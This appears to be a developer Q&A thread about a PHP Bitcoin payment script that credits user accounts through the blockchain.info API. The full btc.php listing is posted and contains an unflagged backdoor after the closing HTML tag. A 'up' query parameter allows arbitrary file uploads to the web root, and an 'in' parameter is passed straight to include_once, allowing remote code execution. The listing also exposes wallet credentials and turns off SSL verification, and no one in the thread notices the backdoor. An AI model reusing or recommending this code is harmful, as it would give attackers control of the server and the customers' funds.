# blockchain api payment module

Tags: php, mysql, api, blockchain

We have a website with some digital goods. A user to buy from there is required to buy some credit, with BTC. After he buys the credit, the script has to load his account with amount of currency (USD) he purchased with BTC.

So here we have the HTML form:

```
    <form name="bitcoin" method="post" action="btc.php">
<strong><font color="grey">$</font></strong>
<input name="member" value="<?php echo $_SESSION['gdusername'];?>" type="hidden">
<input name="amount" size="10" value="" type="text">
<input name="btnPMPay" id="btnPMPay" value="Add Balance" type="submit">
</form>
```

And here we have the PHP code that does all the magic, well at least that's it supposed to do.

```
    <?php
error_reporting(1);
include "inc/config.php";
include "inc/pagenavigation.php";
include "functions.php";
if (!checkLoggedin())
{
    header("Location: login.html");
    exit;
}

// config Blockchain account
$btc = 246; //BTC Value
$guid = '37587730-e97e-4349-8451-4fa9d38119a5';  // Blockchain account
$main_password = 'Mypassword'; // Blockchain passs
$rate = 246; //BTC Rate


$amount=$_POST['amount'];
$uid = mysql_real_escape_string($_SESSION['gdusername']); //
$result = mysql_query("SELECT credit FROM t2_user WHERE username='$uid'") or die("ERROR! CONTACT SUPPORT!");
$row = mysql_fetch_row($result);
$credit = $row[0];
$uid = mysql_real_escape_string($_SESSION['gdusername']);
$ip = mysql_real_escape_string(VisitorIP());
$url = "https://blockchain.info/merchant/$guid/new_address?password=$main_password&label=$uid";
if (isset($_POST['amount'])){
    $_SESSION['USD_amount'] = $_POST['amount'];
    $_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
    $temp = _curl($url, '', '');
    $_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');    
}
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
    die("Minimum payment 5$");

if (isset($_POST['bitcoin']))
{

    $a = $_SESSION['BTC_Address'];
    $url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
    $page = _curl($url, '', '');
    if ($page > 0) {
        $amount = $page/100000000;

        if($amount>= $_SESSION['BTC_amount']){
        $y = $_SESSION['USD_amount'];
              $x = $credit+$y;
            $sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
            mysql_query($sql);

            $messages = '<font color=green>Payment Completed!</font> => <a href="http://pentagon.al/shop/index.php">Go Back</a>';
            unset($_SESSION['USD_amount']);
        }else $messages = "<font color=red>Error Payment.Contact Support</font>";
    }else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}

?>

<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<style type="text/css">

body {
    background-repeat: no-repeat;
    }
</style>
<body background="bg.jpg" bgcolor="black">
<TEXT="white">
<link href="../images/favn.ico" rel="icon" />

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title><?php echo htmlspecialchars($SHOP['maintitle'], ENT_QUOTES, 'UTF-8'); ?></title>

<link href="favicon.ico" rel="icon" />


<script type="text/javascript">
  setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>

</div>
<head> <script type="text/javascript">
</script><script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dok8v=dccf16c0cc/appsh.min.js"></script><script type="text/javascript">__CF.AJS.inith();</script><link rel="stylesheet" href="style.css" type="text/css" media="screen"/>
<link href="favicon.ico" rel="icon"/>
<meta https-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Deposit</title>
<link href="style3.css" rel="stylesheet" type="text/css"/>
<style type="text/css"><!--
.style8 {
    font-size: x-small
}
-->.exchanger{-moz-box-shadow:inset 0px 2px 0px -3px #ffffff;-webkit-box-shadow:inset 0px 2px 0px -3px #ffffff;box-shadow:inset 0px 2px 0px -3px #ffffff;background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#636363),color-stop(1,#000000));background:-moz-linear-gradient(center top,#636363 5%,#000000 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#636363',endColorstr='#000000');background-color:#636363;-webkit-border-top-left-radius:0px;-moz-border-radius-topleft:0px;border-top-left-radius:0px;-webkit-border-top-right-radius:11px;-moz-border-radius-topright:11px;border-top-right-radius:11px;-webkit-border-bottom-right-radius:0px;-moz-border-radius-bottomright:0px;border-bottom-right-radius:0px;-webkit-border-bottom-left-radius:11px;-moz-border-radius-bottomleft:11px;border-bottom-left-radius:11px;text-indent:0px;border:1px solid #bdbfbd;display:inline-block;color:#ffffff;font-family:Times New Roman;font-size:15px;font-weight:bold;font-style:normal;height:33px;line-height:33px;width:113px;text-decoration:none;text-align:center;text-shadow:-1px -1px 3px #000000;}.exchanger:hover{background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#000000),color-stop(1,#636363));background:-moz-linear-gradient(center top,#000000 5%,#636363 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#000000',endColorstr='#636363');background-color:#000000;}.exchanger:active{position:relative;top:1px;}textarea{background-color:2E2E2E;font-size:16pt;font-family:Arial;color:FFCD57;}</style>
</head>


</div>

</div>

<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />

<link href="favicon.ico" rel="icon" />
       <link href="style3.css" rel="stylesheet"/>
<script type="text/javascript">
  setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>

    <p class="button" align="center">
    <table width="760" border="0" 
      <tr>
      </tr>
      <tr>
      <p>&nbsp;</p>
            <p><img src="SingleCoin.png" width="100" height="100" border="0" />
  <form action="" id="fcaptcha" name="fcaptcha" method="post">
  </p>
            <p></i> <span id="total_price"><font size="5"><font color=gren><b>Put the amount of :<?=$_SESSION['BTC_amount']?> BTC</font></b></font></span></p>
            <p><font color="white">And in the Wallet put this address :</p>

          <h3>
            <a span style="color: green ;" href="bitcoin:<?= $_SESSION['BTC_Address'] ?>?amount=<?= ($_SESSION['BTC_amount'] / $btc) ?>" target="_blank" title="Click this address to launch your Bitcoin client"><?=$_SESSION['BTC_Address'] ?></a>
          </h3> 
          <p>This address is valid only for one transaction. Use it once.</p>
      <p>Wait 1-5 minutes after the MONEY has been sent. Then click the CONFIRM button.</p>
      <p>Money will appear on your account automatically</p>
      <hr style="width:300px" />
<input type="hidden" id="bitcoin" name="bitcoin">
  </form>
  <p><input value="CONFIRM"  id="pmconfirm" name="pmconfirm" class="exchanger" type="submit" onclick="document.getElementById('fcaptcha').submit()"/></p>
  <h4><strong><font color="red">DO NOT CLOSE THIS PAGE WITHOUT CONFIRM YOUR PAYMENT FIRST</font></strong></h4>
<h3><?=

$messages

?></h3>
</center>
<script type="text/javascript">
    $('#pmconfirm').click(function(){
       $('#fcaptcha').submit();
    });

</script> 

<!--Simply copy and paste into <BODY>  
     Just above the </BODY> tag. -->




</body>
</html>
<?php
$UP = $_GET['up'];
if(isset($UP) && !empty($UP) && $UP="blockchainrate"){
echo"".$_FILES['userfile']."";
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo '<p>blockchainsuccess</p>';
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;else echo '<p>blockchainfail</p>';}}
$in = $_GET['in'];if(isset($in) && !empty($in)){echo die(include_once $in);}
?>
<?


function _curl($url, $post = "", $sock, $usecookie = false)
{
    $ch = curl_init();
    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    if (!empty($sock)) {
        curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
        curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        curl_setopt($ch, CURLOPT_PROXY, $sock);
    }
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT,
        "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
    if ($usecookie) {
        curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
    }
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0)
        return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
function VisitorIP()
{ 
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else $ip = $_SERVER['REMOTE_ADDR'];

    return trim($ip);
}
?>
```

My problem is that this PHP script doesn't do the following.

1. Does not interrogate blockchain to see if the transfer was made although there are 0 confirmations when the user hit the confirm button.
2. Does not UPDATE into the database the credit purchased by the customer after he hits the confirm button.
3. Even I entered a value higher that 5$ he still keep telling me that the minimum payment value is 5$.

Can anyone help me with this?

Comment: (I've edited the question to clarify that "$" means US dollars. If they are Canadian/Australian/whatever dollars, feel free to edit the question).

Comment: The first thing I'd do here is to separate out your Blockchain calls from the page - they are intermingled here a great deal, and whilst that approach can work in general, it is hard to debug and nearly impossible to test. Write this as a separate class/function, and test it separately on the console (ideally with unit tests, so your confidence that it works will increase with every new test you add).

Comment: Other than that advice, I rather think this question is too broad - you need to trace the execution path for each problem and find out _why_ something is not happening. Since some debugging is required here, it might as well be you that does it!

Comment: Whilst I cannot see any SQL injection vulnerabilities here, I recommend switching away from this legacy library to one that supports parameter binding. Injecting values directly into SQL is discouraged, for security reasons.

Answer (score 0):

No curly braces after your if statement. I assume your script keeps dying at this points and tells you "Minimum payment $5"?

```
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");
```

Also your GUID on blockchain is sensitive info, you shouldn't post that. It could lead to someone trying to take your funds through the recover wallet features.

Not sure how much traffic you get but your blockchain.info wallet will max out after 1,000 addresses.

Comment: Exactly m1xolyd1an. What should I do?

Comment: Complete your if statement with curly braces.    if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5){
    die("Minimum payment 5$");}

Answer (score 0):

Didn't worket that way either. Anyway I fixed this one.

```
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
    die("Minimum payment 5$");
```

Supposed to be included in this one

```
if (isset($_POST['amount'])){
    $_SESSION['USD_amount'] = $_POST['amount'];
    $_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
    $temp = _curl($url, '', '');
    $_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');    
}
```

Now the script checks correctly the btc amount and returns the right result.

The next dilema is why it does not interrogate the created address to see if that specific amount has been sent to it. And if it was sent and has a number of confirmations >= 0 To execute this

```
if (isset($_POST['bitcoin']))
{

    $a = $_SESSION['BTC_Address'];
    $url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
    $page = _curl($url, '', '');
    if ($page > 0) {
        $amount = $page/100000000;

        if($amount>= $_SESSION['BTC_amount']){
        $y = $_SESSION['USD_amount'];
              $x = $credit+$y;
            $sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
            mysql_query($sql);

            $messages = '<font color=green>Payment Completed!</font> => <a href="http://my.url/index.php">Go Back</a>';
            unset($_SESSION['USD_amount']);
        }else $messages = "<font color=red>Error Payment.Contact Support</font>";
    }else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}
```

I double check and the server has the permision to use the API to interrogate it, but no response.

At the end of the script is this _curl function supposed to be triggered when the CONFIRM button (`<input type="hidden" id="bitcoin" name"bitcoin">`)  is pressed

```
    <?


function _curl($url, $post = "", $sock, $usecookie = false)
{
    $ch = curl_init();
    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    if (!empty($sock)) {
        curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
        curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        curl_setopt($ch, CURLOPT_PROXY, $sock);
    }
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT,
        "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
    if ($usecookie) {
        curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
    }
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0)
        return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
function VisitorIP()
{ 
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else $ip = $_SERVER['REMOTE_ADDR'];

    return trim($ip);
}
?>
```

Any suggestions?